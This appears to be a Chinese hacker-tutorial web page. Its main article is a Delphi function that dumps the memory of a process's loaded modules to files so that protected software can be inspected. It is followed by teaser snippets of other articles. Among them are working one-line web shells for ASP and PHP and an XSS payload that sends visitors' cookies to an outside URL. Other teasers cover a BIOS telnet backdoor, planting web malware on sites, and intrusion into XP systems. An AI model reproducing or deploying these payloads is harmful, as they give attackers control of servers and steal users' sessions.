教初学者如何把执行文件内存中的DLL的代码全部保存下来
所属分类:
网络安全 / 黑客教程
阅读数:
1201
收藏 0赞 0分享
有时,有些软件有保护,看不到他程序内部是怎么一个样,如果想简单的把他的内存保存下来!
我写了一个简单的函数,调用一下就可以把DLL和EXE的内存里的信息全部导到文件里!到时再慢慢查吧!
uses
TlHelp32;
procedure GetDLLMemToFile;
var
PID: Dword;
Hand: THandle;
lppe: TModuleEntry32;
found: boolean;
File111: TFileStream;
dd, Add1, Add2, index: dword;
begin
Hand := CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, GetCurrentProcessID);
lppe.dwSize := SizeOf(lppe);
found := Module32First(Hand, lppe);
while found do
begin
File111 := TFileStream.Create('debug\' extractfilename(lppe.szExePath), $FFFF);
Add1 := dword(lppe.modBaseAddr);
Add2 := Add1 lppe.modBaseSize;
index := dword(lppe.modBaseAddr);
while true do
begin
dd := Pdword(index)^;
File111.WriteBuffer(dd, 4);
inc(index, 4);
if index >= Add2 - 4 then break;
end;
File111.Destroy;
found := Module32Next(Hand, lppe);
end;
CloseHandle(Hand); // 释放快照句柄
end;
一句话木马(asp,php) 总结篇
asp一句话
<%execute(request("1"))%>
php一句话
<?php eval($_POST[1]);?>
aspx一句话
<script language="C#" run
收藏 0赞 0分享
asp php XSS获取cookie的代码
<script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</scr
收藏 0赞 0分享
冰河暗涌防不胜防 BIOS下实现的Telnet后门
该项目仅为实验性项目,主要目的是想隐藏一个Telnet后门在主板的BIOS内,并让其随着计算机系统及操作系统成功的运行起来。运行后能反向Telnet连接到指定的计算机接受控制。
项目涉及的相关知识及技术目录
1、 实验环境,使用bochs调试工具。
2、 刷新BIOS技术问
收藏 0赞 0分享
网页挂马详细步骤教程
其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,那么他就成了你的肉鸡了。
下面我介绍5种方法,我一个一个介绍
方法一:这个就是最简单的了,只要你懂点html语言
把下面这段代码插进网页中:
收藏 0赞 0分享
汇编揭开死循环的神秘面纱
i
首先请大家看这么一个简单的小程序:
#include <stdio.h>
void main()
{
int i
收藏 0赞 0分享
用递归写Win32的文件夹遍历
文件夹遍历技术是一种非常有用的技术,在文件的搜索以及杀毒软件中都使用了这种技术。以下我将讨论如何在Win32下实现这种技术。
文件夹遍历技术的核心就是使用递归算法,关于递归算法,我这里就不多介绍了,不明白的朋友请找出谭先生的《C程序设计》参阅相关内容。
以下是
收藏 0赞 0分享
“QQ反骚扰”开发手记
呆在家中上网聊天实在不是一件惬意的事:每一天打开QQ,迎接我的都是一串一串的广告……国庆黄金周,连广告也不放过!:(
无奈,打开Visual C++,开始了我的“反骚扰”之路。
首先我面对的问题是:QQ一共有几种广告,我能
收藏 0赞 0分享
让本地连接不再受限
“本地连接”突然受限
单位局域网中有一台旧计算机,平时安装使用的是Windows XP系统,在该系统环境下该计算机可以正常访问网络;后来,某位同事为了能够在第一时间体验到Windows Vista系统的精彩,特意对该计算机系统进行了升级,不过升
收藏 0赞 0分享
SQL语句导入导出大全
/******* 导出到excel
EXEC master..xp_cmdshell 'bcp SettleDB.dbo.shanghu out c:temp1.xls -c -q -S"GNETDATA/GNETDATA"
-U"sa&quo
收藏 0赞 0分享
黑客教你7招秘籍入侵xp系统
第一招:屏幕保护
在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一个密码确认框,只有输入正确的密码之后才能返回系统,
收藏 0赞 0分享
